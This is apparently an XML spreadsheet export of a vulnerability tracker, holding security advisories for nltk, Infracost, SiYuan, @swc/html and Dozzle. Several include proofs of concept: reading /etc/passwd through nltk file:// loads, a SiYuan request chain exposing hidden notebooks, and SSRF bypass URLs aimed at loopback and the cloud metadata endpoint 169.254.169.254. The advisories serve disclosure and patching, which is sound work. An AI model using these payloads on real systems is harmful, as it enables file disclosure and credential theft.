The affected packages used by .NET 8 and .NET 9 SDKs are built with SDK-specific prerelease versions that aren't published as stable NuGet packages. Update to SDK 8.0.130 or 8.0.424, SDK 9.0.120 or 9.0.317, or SDK 10.0.111 or 10.0.303 to receive the fix.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[CVE-2026-62900](https://www.cve.org/CVERecord?id=CVE-2026-62900)

### Acknowledgements

Ivan Demchuk

### Revisions

V1.0 (08/11/2026): Advisory published.</t></is></c><c r="T11" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62900</t></is></c></row><row r="12"><c r="A12" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B12" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C12" s="5" t="inlineStr"><is><t>CVE-2026-63312</t></is></c><c r="D12" s="5" t="inlineStr" /><c r="E12" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.006</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr" /><c r="L12" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M12" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N12" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr" /><c r="S12" s="5" t="inlineStr"><is><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is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63312</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-65915</t></is></c><c r="D13" s="5" t="inlineStr" /><c r="E13" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.004</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr" /><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M13" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N13" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr" /><c r="S13" s="5" t="inlineStr"><is><t>### Summary

There's a logic bug in `FileSystemPathPointer.open()` inside `nltk/data.py`
that makes the sandbox check permanently inert. The guard condition is always
`False` — meaning any file the process can read is accessible by passing a
`file://` URL to `nltk.data.load()`.

---

### Details

In `nltk/data.py`, `FileSystemPathPointer.open()` was patched at some point
with a comment saying "SECURITY PATCH ENFORCING SANDBOX", but the check
doesn't work:
```python
def open(self, encoding=None):
    path = os.path.normpath(self._path)

    # Block raw absolute reads such as "/" "C:\\Windows" etc.
    if os.path.isabs(path) and path != os.path.normpath(self._path):
        raise ValueError(f"Direct absolute file access blocked: {path}")

    stream = open(self._path, "rb")
```

`path` is set to `os.path.normpath(self._path)` on line 1, then compared
against `os.path.normpath(self._path)` again in the condition. They are
always equal. The `ValueError` never fires.

On top of that, `__init__` already calls `os.path.abspath()` before storing
`self._path`, so it's normalized before `open()` is even called. Running
`normpath` on it again changes nothing.

The `stream = open(self._path, "rb")` line is always reached regardless of
what path was passed in.

---

### PoC

Tested on Python 3.11, NLTK 3.9.1, Ubuntu 22.04.
```python
import nltk
from nltk.data import FileSystemPathPointer

# direct construction
ptr = FileSystemPathPointer("/etc/passwd")
with ptr.open() as f:
    print(f.read(300))

# via load() using file:// URL
data = nltk.data.load("file:///etc/passwd", format="raw")
print(data[:300])
```

Both print file contents. No exception is raised.

---

### Impact

Any app that lets users influence the string passed to `nltk.data.load()` or
`nltk.data.find()` is exposed — web APIs, notebook servers, multi-tenant
pipelines. An attacker can read any file the process user has access to:
`/etc/passwd`, `.env` files, private keys, `~/.aws/credentials`, etc.

## Suggested Fix

**File:** `nltk/data.py` — `FileSystemPathPointer.open()` (lines 378–390)

### What's wrong

Line 387 compares `normpath(self._path)` against itself — always equal,
so the `ValueError` never fires. The check is dead code.
`__init__` already calls `abspath()` on construction, so re-running
`normpath` inside `open()` changes nothing either.

---

### Fix

Validate against the actual list of permitted data directories instead:
```python
def open(self, encoding=None):
    import nltk.data as _d
    allowed = [os.path.abspath(p) for p in _d.path if p]
    if allowed and not any(
        os.path.commonpath([self._path, r]) == r for r in allowed
    ):
        raise ValueError(
            f"Access outside nltk_data blocked: {self._path!r}"
        )
    stream = open(self._path, "rb")
    if encoding is not None:
        stream = SeekableUnicodeStreamReader(stream, encoding)
    return stream
```

---

### Why `commonpath` not `startswith`

`startswith` is bypassable by a path that shares a prefix:
```
/tmp/nltk_data_evil".startswith("/tmp/nltk_data") → True  ✗
commonpath(["/tmp/nltk_data_evil", "/tmp/nltk_data"]) → "/tmp"  ✓
```

---

### Diff
```diff
-    path = os.path.normpath(self._path)
-    if os.path.isabs(path) and path != os.path.normpath(self._path):
-        raise ValueError(f"Direct absolute file access blocked: {path}")
-
+    import nltk.data as _d
+    allowed = [os.path.abspath(p) for p in _d.path if p]
+    if allowed and not any(
+        os.path.commonpath([self._path, r]) == r for r in allowed
+    ):
+        raise ValueError(f"Access outside nltk_data blocked: {self._path!r}")
     stream = open(self._path, "rb")
```</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65915</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-69222</t></is></c><c r="D14" s="5" t="inlineStr" /><c r="E14" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.004</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr" /><c r="L14" s="5" t="inlineStr"><is><t>npm:liquidjs</t></is></c><c r="M14" s="5" t="inlineStr"><is><t>10.27.2</t></is></c><c r="N14" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr" /><c r="S14" s="5" t="inlineStr"><is><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is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D15" s="5" t="inlineStr" /><c r="E15" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M15" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N15" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr" /><c r="S15" s="5" t="inlineStr"><is><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is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-71493</t></is></c><c r="D16" s="5" t="inlineStr" /><c r="E16" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.004</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr" /><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M16" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N16" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr" /><c r="S16" s="5" t="inlineStr"><is><t>### Impact

Path traversal via link following in the Infracost config-template parser. The `readFile`, `pathExists`, `isDir`, and `matchPaths` template functions confined repo-supplied paths with a lexical `filepath.Rel` check plus a leaf-only `os.Lstat`:

```
{{ readFile "evil/file" }}
```

With an intermediate directory symlink committed in the repo (`evil -&gt; /`), the path is lexically clean and the leaf is a regular file, so both checks pass, but `os.ReadFile` follows the symlink and reads outside the checkout. The contents are rendered into the generated config and surfaced via the Infracost dashboard and PR comment, so anyone who can open a pull request can read files off the runner.

Affects `infracost` up to and including `v0.10.44`. Successful exploitation reads any file the CLI process can reach on the runner. Impact depends on what the run exposes: under `on: pull_request` (the configuration in Infracost's documentation) fork pull requests run without secrets and with a read-only token, so exposure is limited. If Infracost runs under `pull_request_target`, or is triggered by a same-repository pull request, the read reaches the repository's secrets, enabling secret theft. The patch confines all four functions regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3586](https://github.com/infracost/infracost/pull/3586)) by routing all four functions through `security.IsPathAllowed`, which resolves symlinks anywhere in the path before a segment-aware containment check. The same fix landed in [config#14](https://github.com/infracost/config/pull/14) and [parser#144](https://github.com/infracost/parser/pull/144).
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: run Infracost under `on: pull_request` rather than `pull_request_target`, and keep fork pull requests from receiving secrets (the defaults).</t></is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71493</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-71494</t></is></c><c r="D17" s="5" t="inlineStr" /><c r="E17" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.004</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr"><is><t>Go:github.com/infracost/infracost</t></is></c><c r="M17" s="5" t="inlineStr"><is><t>0.10.45</t></is></c><c r="N17" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr" /><c r="S17" s="5" t="inlineStr"><is><t>### Impact

Sensitive information exposure in the Infracost Terraform Cloud/Enterprise integration. Several code paths attached a configured secret token to a request whose host was taken straight from the scanned Terraform, with no check that the host was the trusted endpoint. 

The condition that matters is whether a Terraform Cloud/Enterprise (or registry) token is present in the run: if one is, the injected hostname can disclose it. Impact therefore depends on the trigger. Under `on: pull_request` (the only configuration in Infracost's documentation) fork pull requests run without secrets, so no token is present. It only reaches token disclosure under `pull_request_target`, a same-repository pull request, or another CI setup that provides the token alongside untrusted Terraform, and exploiting an untrusted fork pull request also typically needs a maintainer to approve the workflow run. The patch scopes the token to the trusted host regardless of trigger.

### Patches

Fixed in `v0.10.45` ([#3590](https://github.com/infracost/infracost/pull/3590)) by attaching a token only when the destination host matches the configured trusted host; otherwise Infracost refuses to send it and skips remote variable loading
  - Installed via the official script, a package manager, or the `latest` Docker tag: upgrade to `v0.10.45` (or later) to receive the fix.
  - Pinned to a specific version or image digest: bump to `v0.10.45`.

### Workarounds

No full fix without upgrading. To limit exposure: use `on: pull_request` rather than `pull_request_target`, pin `organization`, `workspace`, and `host` in Infracost config so the `.tf` hostname is ignored, and keep Terraform Cloud and registry tokens out of runs that process untrusted pull request content.</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71494</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-72789</t></is></c><c r="D18" s="5" t="inlineStr" /><c r="E18" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.003</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M18" s="5" t="inlineStr"><is><t>0.0.0-20260726020813-a25c2dd06aae</t></is></c><c r="N18" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr" /><c r="S18" s="5" t="inlineStr"><is><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is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72789</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-72790</t></is></c><c r="D19" s="5" t="inlineStr" /><c r="E19" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.002</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr" /><c r="L19" s="5" t="inlineStr"><is><t>Go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M19" s="5" t="inlineStr"><is><t>0.0.0-20260726005141-9edb321eb451</t></is></c><c r="N19" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr" /><c r="S19" s="5" t="inlineStr"><is><t>**CVE:** This vulnerability corresponds to [CVE-2026-72790](https://nvd.nist.gov/vuln/detail/CVE-2026-72790).

### Relationship to GHSA-8x84-r2ff-h8pq (please read first)

`getNotebookInfo` is named in the earlier advisory GHSA-8x84-r2ff-h8pq, in its remediation section, which asked for reader filtering on both `getNotebookConf` and `getNotebookInfo`. Commit `3bc014c7d` applied that filtering to `getNotebookConf` only.

That advisory grouped `getNotebookInfo` under `BoxCrypt`, and `getNotebookInfo` never returns `BoxCrypt`. Anyone checking the handler for key material would correctly find none and move on. This report corrects that characterisation and states what the handler actually discloses, which is notebook metadata rather than key material. If you would prefer this tracked as a follow-up on the original advisory rather than separately, that is entirely reasonable.

### Summary

`/api/notebook/getNotebookInfo` is registered with `CheckAuth` only and applies no authorization check of any kind. Given a notebook identifier, it returns that notebook's author-written name, document count, total size and creation and modification timestamps. It does so for every notebook the server has loaded, including notebooks that `lsNotebooks` deliberately withholds from readers because they are closed or not publish-visible.

### Details

| Item | Detail |
|---|---|
| Route | `kernel/api/router.go:123` `POST /api/notebook/getNotebookInfo` → `model.CheckAuth` → `getNotebookInfo` |
| Middleware | `CheckAuth` only, no `CheckReadonly`, no `CheckAdminRole` |
| Guard in handler | None. `IsReadOnlyRoleContext`, `publishAccess`, `Visible` and `Closed` all return zero matches |
| Exposed | `BoxInfo{ID, Name, DocCount, Size, HSize, Mtime, CTime, HMtime, HCtime}` |
| Affected refs | `eef105683` (v3.7.3, master HEAD) and `v3.7.4-alpha.1`, handler identical on both |

**The handler.** It validates `boxID` against the ID pattern, calls `box := model.Conf.Box(boxID)`, returns a not-found response if that is nil, and otherwise returns `box.GetInfo()` unmodified. `GetInfo()` (`kernel/model/box.go:470`) walks the notebook's files and returns the metadata listed above. There is no ownership check and no publish-access check anywhere on the path.

The nil branch is also a minor existence oracle: a valid-format identifier that names no loaded notebook is distinguishable from one that does.

**Guarded sibling.** `lsNotebooks`, the notebook lister, is also reader-reachable and does filter. For read-only roles it skips any notebook where `notebook.Closed` holds, and skips any notebook whose publish-access entry has `!item.Visible`. The codebase therefore intends closed and non-published notebooks to be invisible to readers. `getNotebookInfo` returns their name and statistics to any reader who supplies the identifier.

**Precedent.** GHSA-f2rw-w22v-54vh restricted `getEncryptedNotebookStatus`, which disclosed encrypted-notebook names and lock state, to administrators. `getNotebookInfo` is the non-encrypted analogue, disclosing regular notebook names and statistics including for notebooks outside the reader's publish scope, and was not restricted.

**Reachability, stated precisely, because it differs by branch.**

On v3.7.3 a reader can obtain the identifier of a notebook they cannot see, by chaining two endpoints that are currently ungated on that branch. `getBlockDefIDsByRefText` returns block and document identifiers workspace-wide, including from hidden notebooks. `getPathByID` then returns the owning notebook identifier for any such block, in its `notebook` field. `getFullHPathByID` additionally discloses the notebook name directly. The chain requires no special conditions beyond a reference text that occurs somewhere in the workspace.

On the development branch those sources are already closed. `getPathByID` now gates through `CheckBlockIdMetadataAccessableByPublishAccessInBox`, `getIDsByHPath` through `filterFileTreeBlockIDsByPublishDiscoverability`, and `getBlockDefIDsByRefText` and `getFullHPathByID` are likewise gated. Notebook identifiers are a fourteen-digit timestamp plus seven random characters, and `Conf.Box(boxID)` returns non-nil only for loaded notebooks, so guessing is not practical. A reader-reachable route on the development branch that yields the identifier of a hidden notebook was not found.

So on the development branch this is defence in depth rather than a live path. It is reported because the handler itself remains unguarded on both branches, and because closing it removes any dependence on those identifier sources staying gated in future.

### Proof of Concept

Precondition: publish mode enabled (default port 6808), anonymous when `Publish.Auth.Enable` is `false`, otherwise any publish reader account. A notebook that is closed or not publish-visible. Steps 1 and 2 apply to v3.7.3; on the development branch, start at step 3 with a known identifier.

Step 1, obtain block identifiers workspace-wide:

```
POST http://127.0.0.1:6808/api/block/getBlockDefIDsByRefText
{"anchor":"&lt;a word likely to occur anywhere in the workspace&gt;"}

→ 200, block and document identifiers including ones inside hidden notebooks
```

Step 2, resolve one to its owning notebook:

```
POST http://127.0.0.1:6808/api/filetree/getPathByID
{"id":"&lt;identifier from step 1&gt;"}

→ 200, the notebook field carries the hidden notebook's boxID
```

Step 3, read the notebook's metadata:

```
POST http://127.0.0.1:6808/api/notebook/getNotebookInfo
{"notebook":"&lt;boxID from step 2&gt;"}

→ 200, returns name, docCount, size, hSize, mtime, ctime, hMtime, hCtime
   for a notebook that lsNotebooks does not return to this same session
```

The differential is the point: call `lsNotebooks` with the same session and confirm the notebook is absent from the list, then call `getNotebookInfo` and receive its name and statistics.

### Impact

An anonymous reader in publish mode, or any publish `RoleReader`, can read the author-written name, document count, total size and activity timestamps of notebooks that are closed or not published, which are exactly the notebooks the notebook lister withholds from them. Notebook names are free text chosen by the author and routinely describe their contents. Document count and size indicate scale, and the modification timestamp reveals recent activity in a workspace area the reader has no access to. Confidentiality only, with no integrity or availability impact, and no document content is disclosed.

### Suggested fix

Apply the same filtering `lsNotebooks` already performs. When `IsReadOnlyRoleContext(c)` holds, return the not-found response unless the notebook is publish-visible and not closed, before calling `GetInfo()`. This is the reader filtering the earlier advisory's remediation section requested for this handler.</t></is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72790</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-72925</t></is></c><c r="D20" s="5" t="inlineStr" /><c r="E20" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.002</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr"><is><t>crates.io:swc_html_minifier, npm:@swc/html</t></is></c><c r="M20" s="5" t="inlineStr"><is><t>1.15.47-nightly-20260729.1, 59.0.0</t></is></c><c r="N20" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr" /><c r="S20" s="5" t="inlineStr"><is><t>## Impact

`@swc/html` minifies JSON contained in `script` elements such as
`application/json` and `application/ld+json` by parsing and serializing the
JSON value.

Before the patched versions, JSON serialization could convert escaped
less-than signs such as `\u003C` into literal `&lt;` characters. If the JSON
contained an escaped `&lt;/script&gt;` sequence, the generated HTML could terminate
the containing script element early because HTML tokenization occurs before
the JSON is consumed.

Applications that minify HTML containing attacker-controlled JSON data could
therefore transform inert data into active markup. A crafted payload could
execute script in the origin of the generated page.

## Patches

The issue is fixed in:

- `@swc/html` 1.15.47
- `swc_html_minifier` 59.0.0

The minifier now re-escapes less-than signs after JSON serialization, preserving
the script element boundary.

## Workarounds

Users who cannot upgrade can disable JSON minification with:

```js
await minify(html, {
  minifyJson: false,
});</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72925</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D21" s="5" t="inlineStr" /><c r="E21" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr" /><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr"><is><t>Go:github.com/amir20/dozzle</t></is></c><c r="M21" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N21" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr" /><c r="S21" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

